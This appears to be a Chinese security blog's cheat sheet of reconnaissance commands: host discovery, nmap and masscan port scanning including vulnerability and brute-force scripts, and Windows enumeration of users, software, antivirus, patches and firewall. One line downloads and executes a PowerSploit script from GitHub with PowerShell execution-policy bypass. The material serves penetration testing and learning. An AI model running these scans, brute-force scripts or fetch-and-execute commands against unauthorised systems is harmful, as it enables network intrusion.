主机/服务器信息收集


主机发现

  • fping -agq 10.10.10.0/24
  • nbtscan.exe -m 10.10.10.0/24,工具地址:http://www.unixwiz.net/tools/nbtscan.html
  • nbtscan -r 10.10.10.0/24
  • for /l %i in (1,1,255) do @ ping 10.0.0.%i -w 1 -n 1|find /i "ttl="
  • @for /l %i in (1,1,255) do @ping -n 1 -w 40 192.168.0.%i & if errorlevel 1 (echo 192.168.0.%i>>c:a.txt) else (echo 192.168.0.%i >>c:b.txt)
  • powershell.exe ‐exec bypass ‐Command "Import‐Module ./Invoke‐TSPingSweep.ps1; Invoke‐TSPingSweep ‐StartAddress 192.168.1.1 ‐EndAddress 192.168.1.254 ‐ResolveHost ‐ScanPort ‐Port 445,135"
  • nmap -v -sn 192.168.0.0/16 10.0.0.0/8
  • netdiscover -r 192.168.1.0/24 -i wlan0

端口扫描及服务识别

Nmap

  • 快速扫描:nmap --min-rate 10000 -A -p1-65535 -T5 10.10.10.2

常用参数:

  • --min-rate:最小速率
  • -A:启用系统检测,版本检测,脚本扫描和路由跟踪
  • -p:端口范围
  • -T:扫描速度等级(0-5)
  • -O:启用系统检测
  • -sV:启用服务信息检测
  • -sT:TCP扫描
  • -sS:SYN扫描
  • -sA:ACK扫描
  • -sU:UDP扫描
  • -sR:RPC扫描
  • -sP:ICMP扫描
  • -sn:不扫描端口
  • -S:伪造源地址
  • --host-timeout:主机超时时间,单位ms
  • --scan-delay:两次报文时间间隔,单位ms
  • -oN:输出正常文件
  • -oX:输出xml文件

高级用法

  1. 默认脚本扫描,主要搜索各种应用服务的信息,收集后,可再针对具体服务进行攻击

    nmap --script=default 192.168.88.131

  2. 检查是否存在常见漏洞

    nmap --script=vuln 192.168.1.104

  3. 提供暴力破解的方式,可对数据库、smb、snmp等进行简单密码的暴力猜解

    nmap --script=brute 192.168.88.131

  4. 利用FTP指定脚本对目标特定FTP协议进行密码爆破

    nmap --script=ftp-brute.nse 192.168.88.131

  5. 利用第三方的数据库或资源,例如进行whoise解析

    nmap --script=external 192.168.88.131

代理扫描

proxychains nmap -sT -Pn 192.168.52.138 192.168.52.141 192.168.52.143 --min-rate 10000 --script=default

masscan

masscan --ports 1-10000 10.10.10.120 --adapter-ip 10.10.10.1

常用参数:

  • --adapter-ip:指定发包地址
  • --adapter-port:指定发包源端口
  • --adapter-mac:指定发包源MAC
  • --router-mac:指定网关MAC
  • --exclude:指定排除扫描的IP

示例

masscan -p0-65535 192.168.3.0/24 --banners --rate 100000000
masscan --ping 192.168.3.0/24 --rate 1000000 --adapter-ip 192.168.3.1

PowerSploit

  • powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.58.0/24 -T 4 -ports '445,1433,3389,80' -oA c:\windows\temp\res.txt"

Nishang

  • get-help invoke-portscan -full Invoke-PortScan -StartAddress 192.168.58.1 -EndAddress 192.168.58.254 -ResolveHost

查看Windows操作系统信息

版本信息

  • CMDversysteminfo
  • WMICwmic OS get Caption,CSDVersion,OSArchitecture,Version
  • PowerShellGet-WmiObject -Class Win32_OperatingSystem

用户信息

  • whoami
  • net user
  • net localgroup administrators

安装的软件

  • WMICwmic product get name,version,packagecache
  • PoserShellGet-WmiObject -Class Win32_Product | Select-Object -Property name,version,packagecache

查看安全软件

  • WMIC /Node:localhost /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

查看服务

wmic service list brief

查看进程

  • tasklist
  • wmic process list brief

查看启动项

  • wmic startup get caption,location,command

查看计划任务

  • schtasks /query /fo list /v

查看当前在线用户

  • query user || qwinsta

列出或断开本地计算机和与之连接的客户端的会话

  • net session

查看补丁

  • systeminfo
  • wmic qfe get hotfixid,caption,description,installedon

查看防火墙配置

  • netsh firewall show config

声明:Hack All Sec的博客|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - 主机/服务器信息收集


Hacker perspective for security